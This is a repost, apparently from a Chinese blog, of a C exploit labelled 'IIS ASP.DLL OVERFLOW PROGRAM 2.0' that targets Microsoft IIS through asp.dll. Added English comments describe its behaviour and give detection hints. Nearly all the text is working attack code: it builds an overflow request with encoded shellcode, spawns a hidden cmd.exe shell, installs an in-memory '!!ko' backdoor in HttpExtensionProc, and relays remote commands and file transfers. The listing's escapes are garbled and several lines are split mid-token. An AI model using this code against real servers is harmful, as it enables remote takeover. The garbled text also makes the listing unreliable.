
img uuty

袁哥在nsfocus帖的代码aspcode,后来删了

发表于2004/10/15 10:23:00  1664人阅读

分类: 文章 程序

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
#pragma  comment(lib,"ws2_32")
// Compile-time constants, prototypes and globals shared by the client in
// main() and the payload routines further down.
//#define  RETEIPADDR  eipwin2000
#define  FNENDLONG   0x08      // bytes of the 0x90 marker run (fnendstr) compared with memcmp
#define  NOPCODE     0x90      // fill byte for buff and shellcodebuff2
#define  NOPLONG     0x50      // only referenced from commented-out code in the visible part
#define  BUFFSIZE    0x20000   // size of each of main()'s four stack buffers
#define  PATHLONG    0x12      // not referenced in the visible part of the file
#define  RETEIPADDRESS 0x468   // initial value of OVERADD in main()
#define  SHELLBUFFSIZE 0x800   // size of the relay buffer Buff in shellcodefn()
#define  SHELLFNNUMS   14      // not referenced in the visible part of the file
#define  DATABASE      0x61    // base added to each nibble of the encoded payload (0x61..0x70)
#define  DATAXORCODE   0x55    // only referenced from commented-out code in the visible part
#define  LOCKBIGNUM    19999999   // modulus of the XOR keystream x = (x*0x100) % LOCKBIGNUM
#define  LOCKBIGNUM2   13579139   // fixed starting value of that keystream
#define  MCBSIZE       0x8     // written to buff7[0] before the body is built
#define  MEMSIZE       0xb200  // main() uses MEMSIZE+0x10 as an offset into the body
#define  SHELLPORT   0x1f90   //0x1f90=8080 (not referenced in the visible part of the file)
#define  WEBPORT     80       // default port when argv[3] is absent or parses to 0
void     shellcodefnlock();
void     shellcodefnlock2();
void     shellcodefn(char *ecb);
void     shellcodefn2(char *ecb);
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void     iisput(int fd,char *str);
void     iisget(int fd,char *str);
void     iiscmd(int fd,char *str);
// NOTE(review): the next three are declared with empty parameter lists, but
// main() calls iisreset and iisdie with (fd,buff+6).
void     iisreset();
void     iisdie();
void     iishelp();
// Defined outside the visible part of the file; presumably send/recv wrappers
// that apply the XOR keystream -- confirm against their definitions.
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
// Globals set by main(); shellcodefn() declares locals named lockintvar1,
// lockintvar2 and lockcharvar that shadow the last three.
  int xordatabegin;
  int  lockintvar1,lockintvar2;
  char lockcharvar;
// Client entry point for the tool announced in the banner below ("IIS ASP.DLL
// OVERFLOW PROGRAM 2.0").
// Arguments, per the banner: <server> [aspfile] [webport] [winxp]; the code
// also reads argv[4] ("winxp"/"apache"), argv[5] ("cn"/"sp0"/"msvcrt"/"sp2")
// and argv[6] (value placed in the HOST header instead of the server name).
// Flow visible in this function: resolve the server, connect, build one GET
// request in buff with strcat, send it followed by a 0xc000-byte body, wait
// for a reply containing "XORDATA", then relay console lines and replies.
// Returns 0 after the relay loop ends; every failure path calls exit(1).
// Observable on the wire (useful for detection and log review): a GET for an
// .asp path whose query string is "!!ko", an oversized Content-Type header
// value (shellcodebuff2 is appended directly after buff5), and
// "Content-length: 2147506431" or "Content-length: 4294967295".
// NOTE(review): as rendered on this page the string escapes are garbled and
// several lines are hard-wrapped mid-token, so the listing does not compile
// as shown.  Input is read with gets() and the buffers are filled with
// unbounded strcpy/strcat.
int main(int argc, char **argv)
{
  char *server;
  // String table copied behind the payload routine (see
  // memcpy(shellcodebuff+k,str,j) below); its end is found by searching for
  // "strend".
  char *str="LoadLibraryA""/x0""CreatePipe""/x0"
       "CreateProcessA""/x0""CloseHandle""/x0"
       "PeekNamedPipe""/x0"
       "ReadFile""/x0""WriteFile""/x0"
       "CreateFileA""/x0"
       "GetFileSize""/x0"
       "GetLastError""/x0"
       "Sleep""/x0"
       "/x09""ntdll.dll""/x0""RtlEnterCriticalSection""/x0"
       "/x09""asp.dll""/x0""HttpExtensionProc""/x0"
       "/x09""msvcrt.dll""/x0""memcpy""/x0""/x0"
       "cmd.exe""/x0""/x0d/x0a""exit""/x0d/x0a""/x0"
       "XORDATA""/x0""xordatareset""/x0"
       "strend";
//  char buff0[]="TRACK / HTTP/1.1/nHOST:";
  // Fragments concatenated into the HTTP request further down.
  char buff1[]="GET /";
  char buff2[]="default.asp";
  char *buff2add;
  char buff3[]="?!!ko ";
  char buff4[]=" HTTP/1.1 /nHOST:";
  char buff5[]="/nContent-Type: application/x-www-form-urlencoded";
  char buff51[]="/nTransfer-Encoding:chunked";
  char buff6[]="/nContent-length: 2147506431/r/n/r/n";  // 0x80000000+MEMSIZ
E-1
  char buff61[]="/nContent-length: 4294967295/r/n/r/n";  // 0xffffffff
  char buff7[]= "/x10/x00/x01/x02/x03/x04/x05/x06/x1c/xf0/xfd/x7f/x20/x21/x0
0/x01";
  char buff11[]= "/x02/x00/x01/x02/x03/x04/x05/x06/x22/x22/x00/x01/x22/x22/x
00/x01";
  char buff10[]="/x20/x21/x00/x01/x20/x21/x00/x01";
  char buff9[]= "/x20/x21/x26/x27/x28/x29/x2a/x2b/x2c/x2d/x2e/x2f/x30";
  char buff8[]= "/x81/xec/xff/xe4/x90/x90/x90/x90/x90/x90/x90/x90/x90";
  /*
  char buff10[]="/x10/x00/x01/x02/x03/x04/x05/x06/x1d/x21/x00/x01/xec/x21/x0
0/x01";
  char buff11[]="/x10/x00/x01/x02/x03/x04/x05/x06/x20/x21/x00/x01/x01/x21/x0
0/x01";
  char buff12[]="/x10/x00/x01/x02/x03/x04/x05/x06/x21/x21/x00/x01/x00/x21/x0
0/x01";
  char buff13[]="/x10/x00/x01/x02/x03/x04/x05/x06/x22/x21/x00/x01/xff/x21/x0
0/x01";
  char buff14[]="/x10/x00/x01/x02/x03/x04/x05/x06/x23/x21/x00/x01/xe4/x21/x0
0/x01";
  char buff15[]="/x10/x00/x01/x02/x03/x04/x05/x06/x24/x21/x00/x01/x90/x21/x0
0/x01";
*/
  char *fnendstr="/x90/x90/x90/x90/x90/x90/x90/x90/x90";
  char SRLF[]="/x0d/x0a/x00/x00";
  char  *eipexceptwin2000add;
        char  eipexceptwin20002[]="/x80/x70/x9f/x74";   //  push ebx ; ret 
address
        char  eipexceptwin2000cn[]="/x73/x67/xfa/x7F";   //  push ebx ; ret
address
        char  eipexceptwin2000[]="/x80/x70/x97/x74";
//     char  eipexceptwin2000[]="/xb3/x9d/xfa/x77";  // /x01/x78";   //  cal
l ebx  address
        char  eipexceptwin2000msvcrt[]="/xD3/xCB/x01/x78";
        char  eipexceptwin2000sp2[]="/x02/xbc/x01/x78";
//     char  eipexceptwin2000[]="/x0B/x08/x5A/x68";
//  char  eipexceptwin2000[]="/x32/x8d/x9f/x74";
    char  eipexceptwinnt[]  ="/x82/x01/xfc/x7F";     //  push esi ; ret  add
ress
//     char  eipexceptwinnt[]  ="/x2e/x01/x01/x78";     //  call  esi  addre
ss
//  char  eipexcept2[]="/xd0/xae/xdc/x77";  //
  char    buff[BUFFSIZE];
  char    recvbuff[BUFFSIZE];
  char    shellcodebuff[BUFFSIZE];
  char    shellcodebuff2[BUFFSIZE];
  struct  sockaddr_in s_in2,s_in3;
  struct  hostent *he;
  char    *shellcodefnadd,*chkespadd;
  unsigned  int sendpacketlong,buff2long,shelladd,packlong;
  int i,j,k,l,strheadlong;
  unsigned  char temp;
  int     fd;
  u_short port,port1,shellcodeport;
  SOCKET  d_ip;
  WSADATA wsaData;
  int offset=0;
  int OVERADD=RETEIPADDRESS;
  int result;
  fprintf(stderr,"/n IIS ASP.DLL OVERFLOW PROGRAM 2.0 .");
  fprintf(stderr,"/n copy by yuange 2002.4.24.");
  fprintf(stderr,"/n welcome to my homepage http://yuange.yeah.net.");
  fprintf(stderr,"/n welcome to http://www.nsfocus.com.");
  fprintf(stderr,"/n usage: %s <server> [aspfile] [webport] [winxp] /n", arg
v[0]);
  buff2add=buff2;
  // With no arguments the server name and .asp file name are read
  // interactively; leading blanks are skipped.
  // NOTE(review): gets() performs no bounds check on recvbuff/shellcodebuff.
  if(argc <2){
      fprintf(stderr,"/n please enter the web server:");
      gets(recvbuff);
      for(i=0;i<strlen(recvbuff);++i){
         if(recvbuff[i]!=' ') break;
      }
      server=recvbuff;
      if(i<strlen(recvbuff)) server+=i;
      fprintf(stderr,"/n please enter the .asp filename:");
      gets(shellcodebuff);
      for(i=0;i<strlen(shellcodebuff);++i){
          if(shellcodebuff[i]!=' ') break;
      }
      buff2add=shellcodebuff+i;
      printf("/n .asp file name:%s/n",buff2add);
  }
  // argv[5] selects one of the hard-coded 4-byte address constants declared
  // above; in the visible code eipexceptwin2000add is then only used inside
  // commented-out blocks.
  eipexceptwin2000add=eipexceptwin2000;
// printf("/n argc%d argv%s",argc,argv[5]);
  if(argc>5){
      if(strcmp(argv[5],"cn")==0) {
          eipexceptwin2000add=eipexceptwin2000cn;
          printf("/n For the cn system./n");
      }
      if(strcmp(argv[5],"sp0")==0) {
          eipexceptwin2000add=eipexceptwin20002;
          printf("/n For the sp0 system./n");
      }
      if(strcmp(argv[5],"msvcrt")==0) {
          eipexceptwin2000add=eipexceptwin2000msvcrt;
          printf("/n Use msvcrt.dll JMP to shell./n");
      }
      if(strcmp(argv[5],"sp2")==0) {
          eipexceptwin2000add=eipexceptwin2000sp2;
          printf("/n Use sp2 msvcrt.dll JMP to shell./n");
      }
  }
  result= WSAStartup(MAKEWORD(1, 1), &wsaData);
  if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
            "to the Internet at the time that "
            "this program was launched, or you "
            "do not have a 32-bit "
            "connection to the Internet.");
        exit(1);
    }
/*
  if(argc>4){
    offset=atoi(argv[4]);
  }
//  OVERADD+=offset;
//  packlong=0x10000-offset+0x8;
  if(offset<-0x20||offset>0x20){
     fprintf(stderr,"/n offset error !offset  -32 --- +32 .");
     gets(buff);
     exit(1);
  }
*/
  if(argc <2){
  //     WSACleanup( );
//       exit(1);
  }
  else  server = argv[1];
  // Normalise the server string: skip leading blanks, drop a leading
  // "scheme:" plus two separator characters, and cut at the first separator.
  for(i=0;i<strlen(server);++i){
     if(server[i]!=' ')
     break;
  }
  if(i<strlen(server)) server+=i;
  for(i=0;i+3<strlen(server);++i){
      if(server[i]==':'){
          if(server[i+1]=='//'||server[i+1]=='/'){
              if(server[i+2]=='//'||server[i+2]=='/'){
                  server+=i;
                  server+=3;
                  break;
              }
          }
      }
  }
  for(i=1;i<=strlen(server);++i){
      if(server[i-1]=='//'||server[i-1]=='/') server[i-1]=0;
  }
  // inet_addr() yields -1 for anything that is not a dotted address; fall
  // back to a DNS lookup in that case.
  d_ip = inet_addr(server);
  if(d_ip==-1){
     he = gethostbyname(server);
     if(!he)
     {
       WSACleanup( );
       printf("/n Can't get the ip of %s !/n",server);
       gets(buff);
       exit(1);
     }
     else    memcpy(&d_ip, he->h_addr, 4);
  }
  if(argc>3) port=atoi(argv[3]);
  else   port=WEBPORT;
  if(port==0) port=WEBPORT;
  // NOTE(review): the socket() result is not checked before use.
  fd = socket(AF_INET, SOCK_STREAM,0);
  i=8000;
  setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
  s_in3.sin_family = AF_INET;
  s_in3.sin_port = htons(port);
  s_in3.sin_addr.s_addr = d_ip;
  printf("/n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_
port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)
{
     closesocket(fd);
     WSACleanup( );
     fprintf(stderr,"/n  connect err.");
     gets(buff);
     exit(1);
}
  // Take the address of the MSVC debug-runtime helper _chkesp, following an
  // 0xe9 (jmp rel32) thunk if the symbol points at one, so that
  // cleanchkesp() can later recognise calls to it in the copied code.
  _asm{
         mov ESI,ESP
         cmp ESI,ESP
  }
  _chkesp();
  chkespadd=_chkesp;
  temp=*chkespadd;
  if(temp==0xe9) {
         ++chkespadd;
         i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
  }
  /*
  shellcodefnadd=shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }
  for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
*/
  memset(buff,NOPCODE,BUFFSIZE);
  /*
  strcpy(buff,buff0);
  if(argc>6) strcat(buff,argv[6]);
  else  strcat(buff,server);
  strcat(buff,"/r/n/r/n"); //Proxy_Connection: Keep-Alive/r/n");
  strcat(buff,buff1);
*/
  // Request line: "GET /" followed by the .asp path with leading separators
  // stripped.
  strcpy(buff,buff1);
  strheadlong=strlen(buff);
  OVERADD+=strheadlong-1;
if(argc>2) buff2add=argv[2];
for(;;++buff2add){
     temp=*buff2add;
     if(temp!='//'&&temp!='/') break;
}
// printf("/nfile:%s",buff2add);
buff2long=strlen(buff2add);
strcat(buff,buff2add);
// fprintf(stderr,"/n offset:%d/n",offset);
// offset+=strheadlong-strlen(buff1);
/*
for(i=0x404;i<=0x500;i+=8){
   memcpy(buff+offset+i,"/x42/x42/x42/x2d",4);  //  0x2d  sub eax,num32
   memcpy(buff+offset+i+4,eipexceptwin2000add,4);
  }
if(argc>5){
    if(strcmp(argv[5],"sp2")==0) {
      memcpy(buff+offset+i,"/x58",1);
    }
}
for(i=0x220;i<=0x380;i+=8){
   memcpy(buff+offset+i,"/x42/x42/x42/x2d",4);  //  0x2d  sub eax,num32
   memcpy(buff+offset+i+4,eipexceptwinnt,4);
  }
for(i=0x580;i<=0x728;i+=8){
   memcpy(buff+offset+i,"/x42/x42/x42/x2d",4);  //  0x2d  sub eax,num32
   memcpy(buff+offset+i+4,eipexceptwinnt,4);
  }
*/
// winnt 0x2cc or 0x71c  win2000 0x130 or 0x468
//  memcpy(buff+offset+i+8,exceptret,strlen(exceptret));
// Locate shellcodefnlock's machine code (again following a jmp thunk), find
// its 0x90 marker run, and stage the 0x100 bytes starting 8 past the match
// at offset 0x1004 of the NOP-filled shellcodebuff2.
shellcodefnadd=shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }
for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
  memset(shellcodebuff2,NOPCODE,BUFFSIZE);
  i=0x1000;
  memcpy(shellcodebuff2+i+4,shellcodefnadd+k+8,0x100);
  // Same lookup for shellcodefn; its code up to the marker run is copied to
  // shellcodebuff, calls to _chkesp are neutralised, and the string table is
  // appended.
  shellcodefnadd=shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
          ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }
  for(k=0;k<=BUFFSIZE;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
//  k+=0x
  memcpy(shellcodebuff,shellcodefnadd,k);   //j);
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  for(j=0;j<0x400;++j){
      if(memcmp(str+j,"strend",6)==0) break;
  }
  memcpy(shellcodebuff+k,str,j);
  sendpacketlong=k+j;
  for(k=0;k<=0x200;++k){
         if(memcmp(shellcodebuff2+i+4+k,fnendstr,FNENDLONG)==0) break;
  }
// Each byte of shellcodebuff is written as two bytes, DATABASE + high nibble
// and DATABASE + low nibble, so the encoded region only contains values
// 0x61..0x70; shellcodefnlock() reverses this.
for(j=0;j<sendpacketlong;++j){
         temp=shellcodebuff[j];
//         temp^=DATAXORCODE;
         shellcodebuff2[i+4+k]=DATABASE+temp/0x10;
         ++k;
         shellcodebuff2[i+4+k]=DATABASE+temp%0x10;
         ++k;
}
j=i+k;
j=j%8+3;
shellcodebuff2[i+j+k]=0;
// j=strlen(shellcodebuff2)%8+3;
for(j=0;j<=0xe000;j+=4){
   strcat(shellcodebuff2,"/x41/x41/x41/x41");  //  0x2d  sub eax,num32
//   strcat(shellcodebuff2,eipexceptwin2000cn);
  }
/*
strcat(shellcodebuff2,"/x90/x90/x90/x90/x90/x90/x90/x90/xeb/x0f/x66/x83/x6c/
x24/x02/x01/x66/x81/x2c/x24/x01/x01/xff/x24/x24/xe8/xec/xff/xff/xff/x90");
for(j=0;j<=0xb00;j+=4){
   strcat(shellcodebuff2,"/x90/x90/x90/x2d");  //  0x2d  sub eax,num32
}
*/
// printf("/nbuff:%s",buff);
printf("/n shellcode long 0x%x/n",sendpacketlong);
// Assemble the rest of the request: query marker, protocol, HOST value,
// Content-Type followed directly by shellcodebuff2, then a Content-length
// line chosen by argv[4].  All of it is appended with unbounded strcat.
if(argc>4&&strcmp(argv[4],"apache")==0){
       strcat(buff," ");
}
else  strcat(buff,buff3);
printf("/n packetlong:0x%x/n",sendpacketlong);
strcat(buff,buff4);
if(argc>6) strcat(buff,argv[6]);
else  strcat(buff,server);
strcat(buff,buff5);
if(argc>4&&strcmp(argv[4],"apache")==0) strcat(buff," ");
else  strcat(buff,shellcodebuff2);
// strcat(buff,buff51);
if(argc>4&&(strcmp(argv[4],"winxp")==0||strcmp(argv[4],"apache")==0)) {
     printf("/n for %s system/n",argv[4]);
     strcat(buff,buff61);
}
else strcat(buff,buff6);
// printf("/n send buff:/n%s",buff);
/*
i=strlen(buff);
memset(buff+i,'a',0xc000);
memset(buff+i+0xc000-strlen(buff7),0,1);
strcat(buff+i+0xc000-0x10-strlen(buff7),buff7);
*/
// strcpy(buff8,buff7);
/* temp=buff7[5];
temp-=offset*0x10;
buff7[5]=temp;
i=*(int *)(buff7+4)+2;
printf("/nSEH=0x%x/n",i);
*/
/*
for(i=0;i<8;++i){
  temp=buff7[i];
  printf("%2x",temp);
}
*/
/*
for(i=0;i<0xc000/0x10;++i){
   strcat(buff,buff7);
}
*/
// printf("/nbuff=%s/n",buff);
// strcat(buff,"/r/n");
// printf("/n send buff:/n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
  sendpacketlong=strlen(buff);
//  printf("buff:/n%s",buff+0x10000);
/*
#ifdef DEBUG
  _asm{
      lea esp,buff
        add esp,OVERADD
      ret
  }
#endif
*/
  // Both keystream states start from the same fixed value.
  lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  lockintvar2=lockintvar1;
  xordatabegin=0;
  for(i=0;i<1;++i){
     j=sendpacketlong;
//     buff[0x2000]=0;
     fprintf(stderr,"/n send  packet %d bytes.",j);
//     gets(buff);
     // First send: request line and headers.  send() results are not checked.
     send(fd,buff,j,0);
     // Then buff is reused for a 0xc000-byte body built from 16-byte records
     // (buff7, patched from buff8..buff11 past offset j).
     buff7[0]=MCBSIZE;
     j=MEMSIZE+0x10;
     i=0;
     if(argc>4&&strcmp(argv[4],"winxp")==0)
     {
           j=0x18;
         i=8;
     }
     for(k=0;i<0xc000;i+=0x10){
         if(i>=j) {
               k=((i-j)/(MCBSIZE*8));
               if(k<=6){
                   memcpy(buff7+0x8,buff10,8);
                   buff7[0x8]=buff8[k];
                   buff7[0xc]=buff9[k];
               }
               else memcpy(buff7,buff11,0x10);
         }
         memcpy(buff+i,buff7,0x10);
     }
     if(argc>4&&strcmp(argv[4],"apache")==0){
         for(k=0xb000;k<=0xc000;k+=2)
         {
             memset(buff+k,0x0d,1);
             memset(buff+k+1,0x0a,1);
         }
         buff[0xc000]=0;
    //     for(k=0;k<0x10;++k)      send(fd,buff,0xc000,0);
    //     printf("/nbuff:%s/n",buff);
     }
     else send(fd,buff,0xc000,0);
      k=0;
      ioctlsocket(fd, FIONBIO, &k);
     j=0;
     // Block until a reply containing the marker "XORDATA" arrives; any other
     // reply is printed.
     // NOTE(review): strstr() scans recvbuff before recvbuff[k]=0 terminates
     // the received data.
     while(j==0){
         k=newrecv(fd,recvbuff,BUFFSIZE,0);
         if(k>=8&&strstr(recvbuff,"XORDATA")!=0) {
            xordatabegin=1;
            fprintf(stderr,"/n ok!recv %d bytes/n",k);
            recvbuff[k]=0;
//            printf("/n recv:%s",recvbuff);
//            for(k-=8,j=0;k>0;k-=4,++j)printf("recvdata:0x%x/n",*(int *)(re
cvbuff+8+4*j));
            k=-1;
            j=1;
         }
         if(k>0){
             recvbuff[k]=0;
            fprintf(stderr,"/n  recv:/n %s",recvbuff);
         }
     }
  }
  k=1;
  ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"/n now begin: /n");
/*
  for(i=0;i<strlen(SRLF);++i){
          SRLF[i]^=DATAXORCODE;
  }
  send(fd,SRLF,strlen(SRLF),0);
  send(fd,SRLF,strlen(SRLF),0);
  send(fd,SRLF,strlen(SRLF),0);
*/
  // Relay loop (socket now non-blocking): when k<0 a console line is read;
  // lines starting with iish/iisput/iisget/iiscmd/iisreset/iisdie are handled
  // by the local helpers, any other line is sent with newsend().  Replies are
  // printed to stderr.  l counts consecutive 20 ms polls without data.
  k=1;
  l=0;
  while(k!=0){
      if(k<0){
          l=0;
          i=0;
          while(i==0){
              gets(buff);
              if(memcmp(buff,"iish",4)==0){
                       iishelp();
                     i=2;
              }
              if(memcmp(buff,"iisput",6)==0){
                       iisput(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iisget",6)==0){
                       iisget(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iiscmd",6)==0){
                     iiscmd(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iisreset",8)==0){
                     iisreset(fd,buff+6);
                     i=2;
              }
              if(memcmp(buff,"iisdie",6)==0){
                     iisdie(fd,buff+6);
                     i=2;
              }
              if(i==2)i=0;
              else i=1;
          }
          k=strlen(buff);
          memcpy(buff+k,SRLF,3);
    //      send(fd,SRLF,strlen(SRLF),0);
    //      fprintf(stderr,"%s",buff);
/*
          for(i=0;i<k+2;++i){
                lockintvar2=lockintvar2*0x100;
                lockintvar2=lockintvar2%LOCKBIGNUM;
                lockcharvar=lockintvar2%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
//              buff[i]^=DATAXORCODE;
          }
             send(fd,buff,k+2,0);
*/
          newsend(fd,buff,k+2,0);
//          send(fd,SRLF,strlen(SRLF),0);
      }
      k=newrecv(fd,buff,BUFFSIZE,0);
      if(xordatabegin==0&&k>=8&&strstr(buff,"XORDATA")!=0) {
          xordatabegin=1;
          k=-1;
      }
      if(k>0){
//          fprintf(stderr,"recv %d bytes",k);
/*
          if(xordatabegin==1){
              for(i=0;i<k;++i){
                lockintvar1=lockintvar1*0x100;
                lockintvar1=lockintvar1%LOCKBIGNUM;
                lockcharvar=lockintvar1%0x100;
                buff[i]^=lockcharvar;   // DATAXORCODE;
              }
          }
*/
          l=0;
          buff[k]=0;
          fprintf(stderr,"%s",buff);
      }
      else{
          Sleep(20);
          if(l<20) k=1;
          ++l;
      }
//      if(k==0) break;
  }
  closesocket(fd);
  WSACleanup( );
  fprintf(stderr,"/n the server close connect.");
  gets(buff);
  return(0);
}
// Decoder stub.  It is not called as a C function by main(); main() finds
// this function's machine code, searches it for the 0x90 marker run and
// copies 0x100 bytes starting 8 past the match into shellcodebuff2, with the
// nibble-encoded payload written where the trailing marker run begins.
// What the assembly does: a call/pop pair obtains the current address in
// edi; esp is set from it and masked with 0xfffff0f0; a second call/pop plus
// five increments leaves esi = edi pointing just past the second call.  The
// looplock loop then reads two bytes at a time, subtracts DATABASE from
// each, combines them as high and low nibble and stores the result in place
// (stosb), stopping at the first zero byte and continuing at `shell`.
// Detection note: because of this encoding the payload region in the request
// is a long run of bytes limited to DATABASE..DATABASE+0x0f (0x61..0x70).
void  shellcodefnlock()
{
       _asm{
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              jmp   next1
getediadd:      pop   edi
                 mov   esp,edi
              and   esp,0xfffff0f0
              jmp   next2
getshelladd:
              push  0x01
              mov   eax,edi
              inc   eax
              inc   eax
              inc   eax
              inc   eax
              inc   eax
              mov   edi,eax
              mov   esi,edi
    //          sub   sp,8
              xor   ecx,ecx
looplock:     lodsb
              cmp  al,cl
              jz   shell
              sub  al,DATABASE
              mov  ah,al
              lodsb
              sub  al,DATABASE
              shl  ah,4
              add  al,ah
    //          lea  eax,ptr word [edx*4+al]
              stosb
              jmp looplock
next1:        call  getediadd
next2:        call  getshelladd
shell:
              NOP
              NOP
              NOP
              NOP
              NOP
              NOP
              NOP
              NOP
    }
}
// Payload routine.  main() copies this function's machine code (up to its
// trailing 0x90 marker run) together with the string table `str` into the
// request, so it is written to run inside the web server process rather than
// in this client.
// ecb: treated as a pointer to the ISAPI extension control block; the
//      offsets used (0, 8, 0x64, 0x6c, 0x84, 0x88) look like cbSize, ConnID,
//      the query string, a path string, WriteClient and ReadClient of
//      EXTENSION_CONTROL_BLOCK in httpext.h -- TODO confirm against the header.
// Behaviour visible below, relevant to detection and host forensics:
//  - finds GetProcAddress by scanning memory for a PE image whose export
//    name starts with "KERNEL32", then resolves the names in the string table;
//  - replaces in-memory pointers equal to HttpExtensionProc with a stub
//    ("door") that re-enters this routine for requests whose query string
//    starts with "!!ko"; this is an in-memory change only;
//  - starts a child process (initially "cmd.exe") with a hidden window and
//    stdin/stdout/stderr redirected to anonymous pipes;
//  - accepts "put " and "get " commands that create or read files by name;
//  - obfuscates the stream with a byte-wise XOR keystream derived from the
//    fixed constants LOCKBIGNUM/LOCKBIGNUM2 (no secret key is involved, so
//    captured traffic can be decoded with those constants).
// The function does not return normally: it loops at `die`, sleeps, or leaves
// through the asmreturn label with HSE_STATUS_SUCCESS.
void shellcodefn(char *ecb)
{    char        Buff[SHELLBUFFSIZE+2];
    int         *except[3];
    // NOTE(review): the FARPROC locals below are never assigned by name; the
    // resolver loop stores into apifnadd[k] with k>=1, which is outside the
    // one-element array -- presumably this relies on the compiler placing
    // these locals next to apifnadd in declaration order; confirm.
    FARPROC     memcpyadd;
    FARPROC     msvcrtdlladd;
    FARPROC     HttpExtensionProcadd;
    FARPROC     Aspdlladd;
    FARPROC     RtlEnterCriticalSectionadd;
    FARPROC     Ntdlladd;
    FARPROC     Sleepadd;
    FARPROC     GetLastErroradd;
    FARPROC     GetFileSizeadd;
    FARPROC     CreateFileAadd;
    FARPROC     WriteFileadd;
    FARPROC     ReadFileadd;
    FARPROC     PeekNamedPipeadd;
    FARPROC     CloseHandleadd;
    FARPROC     CreateProcessadd;
    FARPROC     CreatePipeadd;
    FARPROC        procloadlib;
    FARPROC     apifnadd[1];
    FARPROC     procgetadd=0;
    FARPROC     writeclient;
    FARPROC     readclient;
       HCONN       ConnID;
    FARPROC     shellcodefnadd=ecb;
    char        *stradd,*stradd2,*dooradd;
    int         imgbase,fnbase,i,k,l,thedoor;
    HANDLE      libhandle;
    int         fpt;   //libwsock32;
    STARTUPINFO siinfo;
    PROCESS_INFORMATION ProcessInformation;
    HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
    int         lBytesRead;
    int  lockintvar1,lockintvar2;
    char lockcharvar;
    int  shelllocknum;
//    unsigned char temp;
    SECURITY_ATTRIBUTES sa;
    // call/pop yields the address of the data following this routine in
    // stradd; `except` is then linked in as the head of the exception-handler
    // chain at FS:[0], with the previous head saved in except[2].
    _asm {            jmp    nextcall
         getstradd:   pop    stradd
                      lea    EDI,except
                      mov    eax,dword ptr FS:[0]
                      mov    dword ptr [edi+0x08],eax
                      mov    dword ptr FS:[0],EDI
    }
       except[0]=0xffffffff;
       except[1]=stradd-0x07;
       imgbase=0x77e00000;
       _asm{
          call getexceptretadd
       }
       // Step through memory in 0x10000 increments looking for an 'MZ'/'PE'
       // image whose export name begins "KERNEL32", then walk its export
       // names for one beginning "GetProcA".
       for(;imgbase<0xbffa0000,procgetadd==0;){
            imgbase+=0x10000;
            if(imgbase==0x78000000) imgbase=0xbff00000;
            if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+
0x3c))=='EP'){
                   fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgb
ase;
                   k=*(int *)(fnbase+0xc)+imgbase;
                   if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
                      libhandle=imgbase;
                      k=imgbase+*(int *)(fnbase+0x20);
                      for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
                        if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+i
mgbase+*(int *)k)=='Acor')
                        {
                           k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
                           k+=*(int *)(fnbase+0x10)-1;
                           k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c))
;
                           procgetadd=k+imgbase;
                           break;
                        }
                      }
                   }
            }
          }
// Search for the KERNEL32.DLL module address and the address of the API
// function GetProcAddress.
// Note: the case where a searched page is not present is handled here.
    if(procgetadd==0) goto  die ;
    i=stradd;
           // Resolve every NUL-terminated entry of the string table: an entry
           // starting with 0x09 is a DLL name passed to procloadlib, any
           // other entry is looked up in the current library with procgetadd.
           for(k=1;*stradd!=0;++k) {
                if(*stradd==0x9) libhandle=procloadlib(stradd+1);
                else     apifnadd[k]=procgetadd(libhandle,stradd);
                for(;*stradd!=0;++stradd){
                }
                ++stradd;
           }
           ++stradd;
           // Stores the resolved RtlEnterCriticalSection address at the fixed
           // address 0x7ffdf020; the purpose is not stated in the source.
           k=0x7ffdf020;
           *(int *)k=RtlEnterCriticalSectionadd;
    k=stradd;
    stradd=i;
    thedoor=0;
    i=0;
    _asm{
                   jmp  getdoorcall
getdooradd:     pop  dooradd;
                mov  l,esp
                call getexceptretadd
    }
    // thedoor=1 when ecb already looks like a control block (first dword
    // 0x90) whose string at +0x64 starts with the marker, i.e. this run was
    // entered through the door stub.
    if(i==0){
        ++i;
        if(*(int *)ecb==0x90){
